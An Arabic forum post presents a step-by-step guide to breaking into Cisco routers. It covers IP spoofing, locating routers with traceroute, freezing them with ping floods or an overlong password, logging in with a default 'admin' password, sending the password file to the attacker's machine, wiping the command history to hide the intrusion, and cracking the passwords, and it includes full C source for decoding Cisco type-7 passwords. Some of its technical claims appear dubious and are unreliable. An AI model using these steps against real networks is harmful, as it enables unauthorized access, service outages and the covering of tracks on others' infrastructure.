منتديات تااام
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات فسيح . ما فائدة القلم إذا لم يفتح فكرا . أو يضمد جرحا . أو يرقا دمعة . أو يطهر قلبا . أو يكشف زيفا . أو يبني صرح. أهلا وسهلا بك في منتدياتنا أهلا وسهلا بك ضيفنا الكريم، إذا كانت هذه زيارتك الأولى ... منتدى البرامج العام. هنا سيكون كل شيء خاص بك
 
الرئيسيةأحدث الصورالتسجيلدخول
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
»  كود يمنع النسخ
معلومات مهمه في الهكر Icon_minitimeالثلاثاء أكتوبر 22, 2013 6:34 pm من طرف rohani abdo

» تحميل برنامج تعريف اي كارت شاشة لاي جهاز Download VGA Drive
معلومات مهمه في الهكر Icon_minitimeالأربعاء يونيو 05, 2013 12:09 pm من طرف rohani abdo

» دورة تعلم HTML من البداية حتى الاحتراف
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 2:06 pm من طرف rohani abdo

» تريد ان يكون لك منتداك الشخصي ؟ تفضل
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 1:40 pm من طرف rohani abdo

» احصل على دومين ws مجاناااا
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 1:14 pm من طرف rohani abdo

» تركيب قواعد البيانات Mysqldumper
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 1:08 pm من طرف rohani abdo

»  نقل الدومن من سرفر لاخر
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 12:30 pm من طرف rohani abdo

» مواقع الاستضافة العربيه المجانية
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 12:14 pm من طرف rohani abdo

» تصميم موقع خاص بالتعريف عن الرسول صلى الله عليه وسلم
معلومات مهمه في الهكر Icon_minitimeالثلاثاء مايو 07, 2013 12:06 pm من طرف rohani abdo

ازرار التصفُّح
 البوابة
 الصفحة الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 ابحـث
منتدى
التبادل الاعلاني
احداث منتدى مجاني
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية reddit      

قم بحفض و مشاطرة الرابط منتديات تااام على موقع حفض الصفحات

قم بحفض و مشاطرة الرابط منتديات تااام على موقع حفض الصفحات
اضفنا للمفضلة
اضفنا للمفضلة

 

 معلومات مهمه في الهكر

اذهب الى الأسفل 
كاتب الموضوعرسالة
rohani abdo
Admin



عدد المساهمات : 485
تاريخ التسجيل : 21/02/2010
العمر : 48
الموقع : www.taaam-ma.ahlamontada.com

معلومات مهمه في الهكر Empty
مُساهمةموضوع: معلومات مهمه في الهكر   معلومات مهمه في الهكر Icon_minitimeالسبت أكتوبر 08, 2011 6:12 pm

معلومات مهمه في الهكر










عن الراوترات واهميتها في الشبكات ووظيفتها على الانترنت ومقدمة بسيطة
للتعامل معها . واليوم سنقوم بالتوغل اكثر وبتفصيل اكبر في احد هذه الانواع
من الراوترات وهو اكثرها شهرة على الانترنت واكثرها استخداما وهي من نوع
Cisco Routers
فتح عينك وشغل راسك واقعد كويس علشان هانروح رحلة الى عالم Cisco Systems
... ومتنساش تربط الحزام

تحذير : لا تقوم باستغلال هذه المعلومات في تخريب cisco systems , هذا
الموضوع لغرض تعليمي فقط , فقط استعمل المعلومات في الطريق السليم . ويجب
ان تعلم انه بتخريبك لراوترات سيسكو او حتى مجرد تعطيلها يمكنه ان يتسبب في
مشاكل لمئات من مستخدمين الانترنت وخسائر بالاف الدولارات مما يوقعك في
مشاكل انت في غنى عنها

المحتويات :

في البداية وقبل ان نبدء :

- ما هو عنوان IP

- ما هو الـ ISP

- ماذا تعني TCP/IP packet

- كيف اقوم بعمل spoof للـ IP

- كيف اقوم باستخدام Telnet

- كيف استخدم HyperTerminal

- كيف استفيد من Ping

- كيف استخدم TraceRoute

- كيف استعمل proxy server


- الفصل الاول : لماذا اقوم بأختراق cisco router

- الفصل الثاني : كيف اعثر على cisco router

- الفصل الثالث : كيف اقوم بكسر cisco router والدخول اليه

- الفصل الرابع : كيف اقوم بكسر الباسوردات لـ cisco router


اساسيات يجب عليك معرفتها قبل البداية :


- ما هو عنوان IP :

IP هو اختصار لـ Internet Protocol , وكل جهاز او سيرفر على شبكة الانترنت
يمتلك اي بي اما يكون ثابت او ديناميكي اي متغير , ولا يمكن بأي حال من
الاحوال ان يتشابه رقمان IP , واجهزة الكمبيوتر تتعرف على بعضها عن طريق
ارقام IP الخاصة بها كما يتعرف البشر على بعضهم عن طريق اسمائهم .
ويسهل الحصول على ارقام الاي بي الخاصة بك عن طريق الكثير من الطرق
والادوات ,,,, فيمكن مثلا :
- تدخل على احد المواقع فيقوم الموقع بتخزين الاي بي الخاص بك في ملفات الـ
log
- يستطيع اي احد الحصول على الاي بي الخاص بك عن طريق الـ IRC
- وكذلك على ICQ يستطيع اي احد الحصول على الاي بي الخاص بك حتى لو كنت قد
اختارت خاصية "do not show ip" فبأمكانهم ايضا الحصول عليه
- اذا قمت بالاتصال بأي شخص على الانترنت فبأمكانه كتابة "systat" ورؤية
رقم اي بي المتصل معه
- ممكن يا حد يبعتلك ايميل يحتوي على IP-logging java وبكده يقدر يحصل على
الاي بي الخاص بك
وتوجد طرق اخرى كثيرة للحصول على رقم IP الخاص بك ومن ضمنها برامج التروجن
مثل Sub7 او NetBus.


- ما هو الـ ISP :

ISP هو اختصار لجملة Internet Service Provider وهو ده اللي بيوصلك
الانترنت او اللي انت بتدخل على الانترنت عن طريقه بواسطة dial-up ,,,
وبأمكان الاخرين ان يعرفو الـ ISP بتاعك عن طريق عمل traceroute على الاي
بي بتاعك .. حيث ستخرج نتائج مشابهة للنتيجة التالية :

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<<
target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.


- ماذا تعني TCP/IP packet :

TCP/IP هو اختصار لـ Transmission Control Protocol و Internet Protocol ..
والـ TCP/IP packet عبارة عن حزمة من المعلومات المضغوطة , والحزمة دي
بتحتوي على حاجة اسمها header , والهيدر ده هو اللي بيحدد وجهة الحزمة في
طريقها للاجهزة الاخرى على الشبكة , وهو ده تفسير انتقال البيانات عبر
الانترنت , وضروري نعرف ان الـ header في حزم الداتا بيحتوي على اي بي مرسل
هذه الحزمة او الجهاز المصدر , وعلى فكره انت تقدر تكتب بنفسك packet او
حزمة وتجعلها كأنها قادمة من مصدر اخر غير المصدر الاصلي اللي طلعت منه
وبالتالي تقدر تحصل على صلاحيات ادمين او روت او اي صلاحيات انت عايزها ...
لكن خلي بالك .. علشان تعمل العملية دي لازم تكون بتستخدم لينيكس حيث انه
بيوفرلك اداوت تقدر تنفذ بيها الطريقة دي ... ولكن ده مش موضوعنا الحالي .


- كيف تقوم بعمل spoof للـ IP :

حاول ان تحصل على برنامج مثل Genius 2 او DC IS .. ودول هايعملو على تزوير
الايدينت بتاعك IdentD ,, يعني هايتغير جزء من عنوان جهازك على النت ,
وبأمكانك استعمال الطريقة دي على IRC حيث يمكنك الرجوع الى الروم اللي انت
باند فيها وذلك عن طريق تغيير الايدينت كما يمكنك استخدام عملية ال spoof
اثناء محاولة الحصول على صلاحيات روت على الاجهزة الاخرى ... حيث ان الاي
بي اللي هايتخزن في ملفات الـ logs هايكون الاي بي المزور


- كيف اقوم باستخدام Telnet :

بأمكانك تشغيل الـ telnet ببساطه عن طريق الذهاب الى Start Menu ثم تختار
Run ثم تكتب في المربع Telnet
اضغط على Terminal > Preferences , هنا تقدر تغير buffer size و font
واشياء اخرى , كما تستطيع ايضا فتح او اغلاق "local echo" . وفي حالت فتح
او تشغيل local echo فسيكون بأمكانك رؤية كل شيء تكتبه في نافذة التلنت كما
سيكون بمقدورك رؤية مايكتبه الاخرون في الحال .
في الغالب يكون التلنيت متظبط على انه يتصل بـ telnet port اللي هو رقم 23 ,
ولكن انت بمقدورك تغيير رقم البورت في حالة رغبتك في الاتصال على اية خدمة
او بورت اخر مثل بورت رقم 25 بتاع الميل او بورت رقم 21 لخمدة ال FTP
وغيرها من البورتات ,,,, يوجد الالاف من المنافذ لذا يجب تحديد وجهتك قبل
الاتصال .


- كيف استخدم HyperTerminal :

HyperTerminal يقوم بفتح "server" على اي بورت في جهازك ليقوم بالاستماع
الى المعلومات القادمة الى جهازك من الاجهزة الاخرى اللي انت تحددها
ولتشغيل HyperTerminal اذهب الى Start > Programs > Accessories >
Communications > HyperTerminal . في البداية يجب عليك اختيار نوع
الاتصال .. لذا قم بأختيار "TCP/IP Winsock" ثم حدد الهوست او الاي بي ثم
حدد البورت واعمل اتصال او Call .. وتقدر تخلي البرنامج على وظيفة الاستماع
او listening لاستقبال المعلومات القادمة من اجهزة اخرى عن طريق اختيار
Call > Wait for Call , كما تستطيع عمل Chat او نقل للملفات عن طريق هذا
البرنا

- كيف استفيد من Ping :

اداة Ping تعتبر من ابسط الادوات , كل اللي عليك انك تفتح نافذة MS-DOS
prompt ثم تقوم بكتابة "ping ip.address" , في العادة هايعمل بنج ثلاث مرات
ثم يتوقف , ولكن انت بأمكانك كتابة :
"ping ip.address -t"
وده يخليه يعمل بنج بدون توقف , ولتغيير حجم حزمة البنج المرسلة .. اكتب :
"ping -l (size) ip.address"
وعملية Ping هي عبارة عن ارسال حزمة داتا الى جهاز معين تقوم بتحديده ثم
ترى الرد على الحزمة اللي انت ارسلتها , وتقدر تستفيد من الموضوع ده في
معرفة سرعة الاتصال للجهاز . و الـ Ping ايضا يمكنه ان يقوم بتهنيج الجهاز
او انهياره وذلك عن طريق عمل ping floods اي ارسال حزم كثيرة ذات احجام
كبيرة بسرعة وبدون توقف الى احد الاجهزة . Windows 98 ممكن ينهار بعد دقيقة
واحده فقط من ping flood عليه , وذلك لان البنج يقوم بأستهلاك حجم كبير من
الـ bandwidth ممكن يؤدي الى قطع الاتصال او تهنيج النظام .
واحب اوضح ان عملية Ping flooding ضد الاهداف الكبيرة زي سيرفرات مواقع
مثلا يكون غير مجدي وغير فعال
ملاحظة : اختيار -t مع البنج لا يعني انه فلوود حقيقي , ولكن يعني عمل بنج
للهدف بصورة مستمرة . بينما في جميع توزيعات Unix او Linux يمكنك استخدام
الخاصية ping -f لعمل فلووود بنج حقيقي وفعال


- كيف استخدم TraceRoute :

عملية TraceRoute تستخدم لتتبع جهاز او اي بي معين , يعني مثلا لتقوم بتتبع
اتصالك لكي تعرف الاجهزة اللي بينك وبين الهدف , كل اللي عليك انك تفتح
نافذة MS-DOS prompt ثم تقوم بكتابة "tracert ip.address" وسوف تظهر لك
قائمة بالاجهزة اللي بينك وبين الجهاز الهدف . ومن خلال الحكاية دي تقدر
تحدد اذا كان فيه firewalls موجوده او تحديد ISP (internet service
provider) لاي شخص
وساقوم الان بشرح مبسط وموجز لميكانيكية عمل TraceRoute لكي يسهل عليك
فهمها :
اولا عند قيامك بأمر TraceRoute على اي بي او جهاز معين فيقوم جهازك بارسال
TCP/IP packet تحتوي على قيمة معينة في الـ header بتاع الحزمة , هذه
القيمة تسمى TTL وهي اختصار لـ Time To Live . وعند مرور الحزمة على
الاجهزة والراوترات فتنقص قيمة الـ TTL بمقدار واحد عند كل راوتر او جهاز ,
والحكاية دي مهمة جدا .. لان احيانا يحصل خطأ معين في اي حاجه سواء في
الحزمة او الاجهزة مما يؤدي الى ان الحزمة تفضل ماشية في الشبكة بدون توقف
وتقوم باستهلاك كمية كبيرة من الـ bandwidth , ولهذا عندنا ينقص مقدار الـ
TTL ويصل الى الصفر .. فتموت الحزمة ويقوم بروتوكول ICMP بأرسال رسالة خطأ
الى مرسل الحزمة
اما اذا لم يوجد اخطاء فأن الحزمة ستقوم بأرسال رسالة الى مرسلها عند
مرورها على كل جهاز او راوتر الى ان تصل الى الجهاز الهدف
اتمنى تكونو فهمتو على الاقل الفكرة العامة للـ TraceRoute


- كيف استعمل proxy server :

قم بالبحث في شبكة الانترنت عن اي من proxy server على البورت اللي انت
عاوزه , وعندما تجد احدها قم بالاتصال به عن طريق telnet او hyperterminal
او غيرها وبعد كده قم بالاتصال بأجهزة اخرى من خلال هذا البروكسي وبكده فلن
يعرف احد عنوان الاي بي الحقيقي لك

==============================================

- الفصل الاول : لماذا اقوم بأختراق cisco router ؟

اعتقد ان البعض هايسأل نفسه .. لماذا اقوم بأختراق cisco router ؟
وانا عارف ان البعض يقوم بالاختراق بهدف التخريب بس .. ولكن لو هو حدد
الهدف المنشود من عملية الاختراق وعرف ممكن يستفيد من النظام اللي اخترقه
ازاي فسوف يختلف الوضع تماما ... خلونا نشوف ايه الفايدة من اختراق cisco
routers
اولا : راوترات سيسكو تتميز بسرعة عالية جدا حيث انها تستخدم نظام اتصال 18
T1 الفائق السرعة , واحنا شرحنا الدرس اللي فات وظيفة راوترات سيسكو في
ربط الشبكات ... يعني تخيل مثلا ان راوتر خارج منه العديد من خطوط الانترنت
الى سيرفرات او ISP وكل سيرفر او ISP طالع منه خطوط تانيه لاجهزة اخرى
فتخيل السرعة اللي لازم يكون عليها الراوتر علشان يقدر يمد كل الاجهزة دي
بالسرعة اللازمة لها ... اذن نستنتج من هنا انك تقدر تستخدم الراوتر في
هجوم DENIAL OF SERVICE اللي بيكون مؤثر اذا كان الهجوم له سرعة عالية زي
الراوتر كده كما تستطيع اختراق انظمة اخرى من خلال الراوتر زي ماوضحنا قبل
كده في الدرس اللي فات وذلك عن طريق استغلال خدمة الـ Telnet الموجودة في
الراوتر .
ايضا يجب ان تعرف ان هناك الاف من الـ packets او الحزم تمر عبر وخلال هذا
الراوتر وبالتالي تستطيع ان تقوم بالتقاط بعض هذه الحزم ثم تقوم بعمل
decoded لها ورؤية كل المعلومات السرية والخاصة والباسوردات و و و و....
التي تمر عبر الراوتر
واضيفلك معلومة كمان وهي ان راوترات سيسكو هي trusted systems زي اداوت
يونيكس rcp و rsh اللي بتديك اكسس وصلاحيات في الشبكة المحلية بتاعتها
وبالتالي تقدر تشوف شغلك على الاجهزة اللي موجودة في الشبكة ( للمزيد من
المعلومات عن اداوت rcp و rsh راجع الدرس اللي كتبته بعنوان
arabita

- الفصل الثاني : كيف اعثر على cisco router ؟

عملية ايجاد راوتر سيسكو هي عملية بسيطة وقانونية , دائما مايكون لدى اي
ISP راوتر خاص به و معظم هذه الراوترات تكون من نوع سيسكو وتقدر انت تجيب
عنوان اي بي الراوتر عن طريق انك تعمل traceroute على اي مستخدم من مستخدمي
ISP معين ( شرحنا فوق عملية ISP ) وبعد ماتعمل traceroute على الـ IP
فسيقوم باظهار كل الاجهزة والايبيهات اللي بينك وبينه ومن ضمنهم اي بي الـ
ISP واي بي الراوتر بتاعه وغيره ... واحنا يهمنا هنا اي بي الراوتر بس ,
وده مثال :
tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<<
target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
قم بتحويل المثال الى اليسار علشان تقدر تشوفه
نلاحظ عند الجهاز الخامس انه راوتر سيسكو
دلوئتي انت حددت الراوتر وعنوانه , لكن احتمال ان الراوتر يكون محمي بـ
firewall علشان كده لازم تبعتله بنج Ping مرتين وتنتظر الرد , فلو طلع فيه
رد اذن ده مؤشر ان الراوتر معليهوش حماية من firewall اما لو لقيت مفيش رد
يبئى تعرف ان الراوتر عليه حماية من firewall وان الاي بي بتاعك اتعمله
بلوك من الراوتر
طرقة تانية لمعرفت ان كان يوجد firewall او لاء هي انك تفتح التيلنت وتشبك
على الراوتر عن طريق البورت رقم 23 عادي .... فلو طلعلك حاجه بتقولك ادخل
الباسورد ومفيش يوزر نيم .. اذن تعرف انك دلوئتي على الراوتر , اما لو
طلعلك رسالة بتقولك ادخل اليوزر نيم والباسورد فتعرف ان انت دلوئتي موجود
داخل الفاير وول
من الاخر كده علشان تريح دماغي ودماغك .. دورلك على راوتر مش محمي من
فايروول , ويبئى لينا لقاء تاني عن موضوع الفايروول ده . المهم دلوئتي اول
ماتلاقي راوتر كويس كده و ابن حلال ومعليهوش فايروول .. ابدء بالبحث عن
proxy server يسمح بالاتصال عن طريق البورت 23 علشان الاي بي بتاعك لا يتم
تسجيله في ملفات الـ LOGs للراوتر


- الفصل الثالث : كيف اقوم بكسر cisco router والدخول اليه

معظم راوترات سيسكو تقوم بتشغيل نظام v4.1 software على الجهاز اللي يعتبر
ضعيف الحماية . فبأمكانك انك تشبك على الراوتر عن طريق التيلنت بالبورت 23
ثم تقوم بأدخال باسورد كبيرة وطويلة مثل هذه :

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384
7465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpw
oeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiruty
alskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjf
hgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxnc
bv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019ds
k10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

انتظر قليلا .. فيه احتمال ان الراوتر يحصله reboot او ريستارات , طبعا مش
هاتقدر تخترقه لانه offline في الحالة دي . لكن غالبا مش هايحصله ريستارت
.. انما هاتحصله عملية freeze او يهنج لفتره تمتد من 2-10 دقايق وفي الفترة
دي انت لازم تعمل على اختراق الراوتر
اما لو حصل اي حاجه غير كده فذلك يعني ان نظام تشغيل الراوتر ليس v4.1
software .. وان الباسورد الطويلة ان تنجح معاه , والحل؟
في الحالة دي ممكن تستخدم هجوم DOS على الراوتر .. زي مثلا فلووود بنج ,
روح للدوس واكتب "ping -l 56550 cisco.router.ip -t" , وده هايجيب نفس
النتائج اللي في الحالة الاولى
دلوئتي واثناء الراوتر في حالة frozen او تهنيج .. قم بفتح كونكشن او اتصال
تاني مع الراوتر عن طريق بروكسي اخر ( لازم يكون بروكسي يختلف عن الاول )
وبعد كده اكتب الباسورد دي "admin" .... ممكن واحد يسأل ويقول لماذا لم يتم
استخدام الباسورد من الاول ؟
والسبب هو ان هذه الباسورد هي الـ default password لاغلب راوترات سيسكو ,
وعندما يكون الراوتر في حالة frozen او تهنيج فأنه يعد نفسه على وضع الـ
default بتاعه
والان وبعد دخولك الى الراوتر يجب عليك طلب ملف الباسورد , لازم تعرف ان
انظمة تشغيل راوترات سيسكو متعدده وليس نظام واحد ولكن الـ prompt الشائع
لها غالبا مايكون زي كده : "htl-textil" , الان قم بكتابة "?" علشان تظهر
قائمة الاوامر وطبعا هاتظهرلك قايمة كبيرة من الاوامر , حاول تبحث عن امر
النقل transfer command .. ثم استخدمه للحصول على ملف الباسورد للادمين (
خلي بالك انك الادمين حاليا ) ثم قم بأرسال الملف الى عنوان IP الخاص بك
على البورت 23 .. ولكن قبل ان ترسل الملف الى جهازك يجب ان تعمل الاتي :
قم بتشغيل برنامج HyperTerminal ( تم شرح البرنامج في اول الموضوع ) وبعد
تشغيله قم بجعله على وضع wait for a call من راوتر سيسكو .. يعني تخلي
البرنامج على وضعية الترقب لانتظار اشارة من عنوان راوتر سيسكو . ودلوئتي
اول ماتقوم بأرسال الملف من الراوتر .. فسوف يقوم برنامج HyperTerminal
بسؤالك ان كنت تريد استقبل الملف المرسل من الراوتر , اختار yes واحفظ
الملف على الهارد عندك . وقبل ماتخرج من الراوتر وتفصل .. قم بمسح الـ
history علشان محدش يعرف انك دخلت وذلك عن طريق كتابة الامر التالي في
التريمينال "history size 0"
وبعد كده اعمل Logout
وبكده اقدر اقولك انك خلصت اهم الجزء الاصعب والاهم في الموضوع كله ...
تقدر تستريح شوية دلوئتي علشان تستعد لكسر الباسورد اللي حصلت عليها


- الفصل الرابع : كيف اقوم بكسر الباسوردات لـ cisco router ؟

والان وبعد ان قمت بأحضار ملف الباسورد الى جهازك فأنت محتاج لكسره لكي
تمتلك الباسوردات اللي تمنحك الصلاحيات الكاملة لدخول الراوتر مرة اخرى .
ولعمل ذلك .. قم بأستخدام برنامج مثل John the Ripper او اي برنامج اخر
لكسر الباسوردات .
دي تعتبر اسهل طريقة وانا انصح بها . والطريقة الاخرى هي فك تشفير الملف ,
وسوف تحتاج الى برامج فك التشفير .. ويوجد منها الكثير .. وممكن عن طريق
الاكواد البرمجية التي تقوم بفك التشفير وكسر الباسوردات
وده كود يقوم بفك تشفير باسورد راوترات سيسكو . وانت عليك تعمله compile
تحت نظام يونيكس او لينيكس
اعمل Ctli + Shift لرؤية الكود بالطريقة السليمة


#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n",
pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}


اما اذا لم تكن تمتلك نظام Linux فالطريقة الوحيدة هي استخدام برنامج زي
John the Ripper او اي برنامج كسر باسورد اخر .

---------------------------------------------

لتحميل برنامج John the Ripper
http://www.openwall.com/john/

ودي قايمة بأشهر اوامر راوترات سيسكو واللي موجوده في جميع السوفت وير
بتاعتها


<1-99> Session number to resume
access-enable Create a temporary Access-List entry
access-profile Apply user-profile to interface
clear Reset functions
connect Open a terminal connection
disable Turn off privileged commands
disconnect Disconnect an existing network connection
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
mls exec mls router commands
mrinfo Request neighbor and version information from a multicast router
mstat Show statistics after multiple multicast traceroutes
mtrace Trace reverse multicast path from destination to source
name-connection Name an existing network connection
pad Open a X.29 PAD connection
ping Send echo messages
ppp Start IETF Point-to-Point Protocol (PPP)
resume Resume an active network connection
rlogin Open an rlogin connection
set Set system parameter (not config)
show Show running system information
slip Start Serial-line IP (SLIP)
systat Display information about terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
traceroute Trace route to destination
tunnel Open a tunnel connection
where List active connections
x28 Become an X.28 PAD
x3 Set X.3 parameters on PAD
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://taaam-ma.ahlamontada.com
 
معلومات مهمه في الهكر
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  كود برامج مهمه
» أغرب معلومات عن ليلة الدخلة
» برنامج يعطيك معلومات كاملة عن مرسل الايميل

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات تااام :: المنتديات التقنية :: منتدى الكمبيوتر والإنترنت-
انتقل الى: